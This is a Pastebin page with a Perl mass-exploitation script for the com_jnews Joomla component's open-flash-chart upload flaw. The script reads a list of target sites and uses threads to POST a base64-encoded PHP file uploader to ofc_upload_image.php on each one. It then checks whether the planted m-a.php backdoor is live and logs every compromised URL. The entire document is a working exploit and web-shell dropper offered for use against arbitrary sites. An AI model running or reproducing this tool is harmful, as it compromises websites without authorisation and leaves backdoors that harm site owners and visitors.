Advertisement
Not a member of Pastebin yet?
Sign Up,
it unlocks many cool features!
- #!/usr/bin/perl
- # Module Needed :)
- use strict;
- no warnings;
- use threads;
- use threads::shared;
- use LWP::UserAgent;
- use HTTP::Request;
- use LWP::Simple;
- use HTTP::Request::Common;
- use Term::ANSIColor;
- use Win32::Console::ANSI;
- use MIME::Base64;
- ##############################
- if($^O =~ /Win/){
- system("cls");
- }else{
- system("clear");
- }
- my $ua = LWP::UserAgent->new;
- $ua->timeout(15);
- $ua->agent('Mozilla/5.0');
- print color("bold red"),"[+] Com_jnews Joomla Components RCI Exploits Scanner (Threads on) \n";
- print color("bold red"),"[+] coded by Mr_AnarShi-T\n";
- print color("bold red"),"[+] Gr33T's : Boy Security & cold Zero & Dod & Normal & Orange man & all \n";
- print color("bold red"),"[+] Home : Www.site.com & My Lab :) \n\n";
- print color 'reset';
- print color("green"),"[+] Enter File : ";
- print color 'reset';
- my $file=<STDIN>;
- chomp($file);
- print color("green"),"\n[+] Enter Thread Number : ";
- print color 'reset';
- my $thread=<STDIN>;
- chomp($thread);
- my $threads = $thread;
- my @linkz : shared;
- my @paths : shared;
- GetLinks();
- while (threads->list) {}
- print color ('green');
- print "\n[+] Link Founded : ";
- print color 'reset';
- print"".scalar(@linkz)."\n\n";
- CheckLinks();
- while (threads->list) {}
- sub GetLinks {
- open( LNK, "$file" ) or die "$!\n";
- while( defined( my $line_ = <LNK> ) ) {
- chomp( $line_ );
- push( @linkz, $line_ );
- }
- close( LNK );
- }
- sub CheckLinks {
- foreach my $link( @linkz ) {
- my $ctr = 0;
- foreach my $thr ( threads->list ) { $ctr++; }
- if ($ctr < $threads){
- threads->create( \&CheckLinkz_exploits,$link );
- }
- else { redo; }
- }
- }
- sub CheckLinkz_exploits {
- my $link = shift ;
- chomp ($link);
- my $site_vul = "http://".$link . "/components/com_jnews/includes/openflashchart/php-ofc-library/ofc_upload_image.php?name=m-a.php";
- my $encoded = "PD9waHANCmVjaG8gJzx0aXRsZT5VcGxvYWQgRmlsZXMgTXJfQW5hclNoaS1UIDwvdGl0bGU+JzsNCmVjaG8gJzxmb3JtIGFjdGlvbj0iIiBtZXRob2Q9InBvc3QiIGVuY3R5cGU9Im11bHRpcGFydC9mb3JtLWRhdGEiIG5hbWU9InVwbG9hZGVyDQoiIGlkPSJ1cGxvYWRlciI+JzsNCmVjaG8gJzxpbnB1dCB0eXBlPSJmaWxlIiBuYW1lPSJmaWxlIiBzaXplPSI1MCI+PGlucHV0IG5hbWU9Il91cGwiIHR5cGU9InN1Ym1pdCINCmlkPSJfdXBsIiB2YWx1ZT0iVXBsb2FkIj48L2Zvcm0+JzsNCmlmKCAkX1BPU1RbJ191cGwnXSA9PSAiVXBsb2FkIiApIHsNCiAgICAgICAgaWYoQGNvcHkoJF9GSUxFU1snZmlsZSddWyd0bXBfbmFtZSddLCAkX0ZJTEVTWydmaWxlJ11bJ25hbWUnXSkpIHsgZWNobyAnDQo8Yj5VcGxvYWQgQ29tcGxhdGUgISEhPC9iPjxicj48YnI+JzsgfQ0KICAgICAgICBlbHNlIHsgZWNobyAnPGI+VXBsb2FkIEZhaWxlZCAhISE8L2I+PGJyPjxicj4nOyB9DQp9DQo/Pg==";
- my $evil = decode_base64($encoded);
- my $res = $ua->request(POST $site_vul,Content_Type => 'text/plain', Content => $evil);
- print "[+] Checking $link\n\n";
- if ($res->is_success){
- print "[+] $link is vul\n";
- print "[+] Checking If The Evil code Was Uploded\n";
- my $vul="/components/com_jnews/includes/openflashchart/tmp-upload-images/m-a.php";
- my $url = "http://".$link. $vul;
- my $request = HTTP::Request->new(GET=>$url);
- my $useragent = LWP::UserAgent->new();
- my $response = $useragent->request($request);
- if ($response->content=~m/<title>Upload Files Mr_AnarShi-T <\/title>/g){
- print color("yellow"),"[.] Found => $url\n\n";
- print color 'reset';
- open(BEN,">>result-$link.txt");
- print BEN "$url\n";
- close(BEN);
- }
- else
- {
- print "[.] Not Found \n";
- }
- }
- threads->detach();
- }
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement